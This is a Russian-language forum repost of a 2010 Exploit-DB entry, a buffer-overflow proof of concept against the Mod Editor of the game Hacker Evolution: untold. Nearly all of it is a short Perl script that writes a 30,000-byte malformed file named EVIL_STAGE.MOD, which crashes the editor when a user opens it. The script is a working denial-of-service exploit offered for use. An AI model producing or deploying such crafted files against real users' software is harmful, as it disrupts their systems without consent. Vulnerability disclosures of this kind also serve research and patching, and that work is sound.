Exploit Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13939
Проверка EDB
  1. Пройдено
Автор
GUNSLINGER_
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-06-19
Код:
#!/usr/bin/perl
# Title         : Hacker Evolution: untold Mod Editor buffer overflow 
# Date          : June 19, 2010
# Author        : gunslinger_ <[email protected]>
# Web		: http://devilzc0de.com
# Blog		: http://gunslingerc0de.wordpress.com
# Software Link : http://www.exosyphen.com/page_hacker-evolution-untold.html
# Version       : 2.00.001
# Tested on     : Windows XP SP2
# Open Hacker Evolution Mod editor -> open file -> EVIL_STAGE.MOD

my $file= "EVIL_STAGE.MOD";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "MOD File Created successfully\n";
 
Источник
www.exploit-db.com

Похожие темы